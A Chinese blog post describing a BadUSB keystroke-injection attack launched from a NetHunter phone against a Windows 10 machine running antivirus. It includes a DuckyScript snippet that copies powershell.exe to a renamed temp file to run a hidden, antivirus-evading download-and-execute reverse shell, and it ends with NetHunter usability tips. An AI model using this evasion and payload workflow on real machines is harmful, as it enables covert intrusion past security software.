用手机NetHunter进行Badusb攻击并绕过杀毒软件

废话

前阵子手机炸了，而后刷了一个比较新的LinageOS。4.x的内核，有Gadget ConfigFS支持。
刷机，Magisk，Xposed，一路刷上。
肯定要整一个NetHunter玩玩啦，那么就去KALI官网下载了一个zip，刷上就好。如何安装去看官方文档。

本文会尝试把整套HID攻击都放在手机和一条充电用的线上面。

至于手机安装NetHunter后出现的一些问题，比如终端很不好用，SaftyNet问题，我会写在后面。

山穷水复

目标：windows 10，安装了某绒。

先用USB arsenal创建hid设备，然后配置了一个meterpreter的powershell。
我们只需要下载并执行它就好。

USB_Arsenal

HID attack选项卡的功能不好用。没有成功。因为这些功能不怎么灵活。攻击脚本都是写死的。
我只能用DuckHunter自己编写一段脚本进行攻击，但是没有成功：

在隐藏运行powershell的时候被拦截下来，就算跳过这一步，执行的时候也会被拦截。

重新思考这个问题

虽然说，HID攻击是我可以接触到靶机的情况，但是为了隐蔽过程，我总不能坐下来，抽出键盘，然后右键杀软托盘icon，点一个退出，再选退出1个小时…….

首先，肯定是杀软监控了powershell这个程序的活动并且进行了拦截。甚至在IEX之前就检查了从网络上下载的脚本。
于是我想着变形HID输入的脚本，并且攻击载荷也要换。

柳暗花明

我后面给powershell变形了好几次，但是隐藏运行这点绕不过去。只要隐藏运行，杀软必拦截。
不隐藏的话蓝窗会闪很久，容易引起警觉。
而且对于攻击载荷的拦截就是玄学。

我看了网上有人解决方案是自己写了一个程序，能接受参数并调用一些API。可是这对于HID攻击并不友好。因为攻击进行时间应该越短越好，下载文件越大越不可控，闪过的东西越多越容易暴露。

powershell-backdoor-generator

首先稳定载荷，我后来用了：powershell-backdoor-generator

这个项目蛮有意思，目前挺新的，可以生成一个被混淆的powershell脚本。另一方面这个脚本也可以生成支持Rubber Ducky脚本的运行命令。同时开启反弹shell监听和一个http服务器。前者监听靶机上线，后者可以配合HID下载攻击载荷。

由于项目比较新，并且存在混淆，杀软不会报毒。

我可以直接把这个工具安装在手机里：

Termux_with_powershell-backdoor-generator

绕过隐藏执行拦截

其实这个很有意思，上文才说有人写程序调用API绕过。
而我直接复制了powershell.exe到一个临时路径，并且修改了名字。

DELAY 200
GUI r
DELAY 150
STRING cmd /c "C:\WINDOWS\System32\PowerShell\v1.0\PowerShell.exe %TEMP%\p.exe"
ENTER
DELAY 500
GUI r
DELAY 150
STRING %TEMP%\p.exe -w hidden IEX blablablablabla.......

因为PowerShell.exe位置比较固定，于是我用了这招复制了powershell.exe拷贝到了临时文件目录命名为p.exe
而后用p.exe执行就绕过了杀软。

这样会弹出两次运行窗口，但是都是很快的一闪而过，整个过程大概1秒钟。

powershell-backdoor-generator-getshell

我不知道这个方法能活多久。
HID攻击拿到这个shell只是第一步，机会只有一次，而且很容易掉链子。做到一击必杀有点困难。

谈谈NetHunter的感受

我不觉得普通手机装NetHunter特别的实用。除非你有合适的网卡。
里面很多现成工具很难做到开箱即用，和当时的csploit,dsploit什么的不好比。
你说它功能强大吧，也就那样。毕竟手机都root了，Termux也可以装很多工具。
我完全可以在Termux中启动一个Bettercap的web ui来玩MITI，NetHunter的ui设计真的一言难尽。
Termux也可以安装Metasploit，也可以装Nmap。
然后自带的终端特别难用，折腾半天不知道怎么ctrl+c，复制出点文本也都很难。
本文用的Duck Hunter貌似没有完美兼容Rubber Ducky语法，F1-F12键不能用。甚至自带的脚本都不兼容。DuckHunter写了脚本换到USB arsenal启动HID再换回来，之前的就白写了。自带的保存按钮能保存，但是又不能加载你保存的代码。

还是那句话，除非你有合适的网卡，否则没必要。

SafetyNet无法通过的问题

这个问题着实坑了我一下，当时Safetynet死活过不了，一直报RESTORE_TO_FACTORY_ROM
就算是刷了一些绕过工具依旧不行。
结果是因为NetHunter会禁用SELinux。必须去终端手动setenforce 1来解决。

NetHunter自带的终端太难用了，怎么办？

不只是我一个人吐槽这个问题，ctrl按不了，也没办法复制，这怎么用？
于是有人做了一个脚本，可以在Termux中打开Kali chroot。
boot-nethunter

安装NetHunter的chroot和Termux后用这个脚本，可以直接在Termux中使用。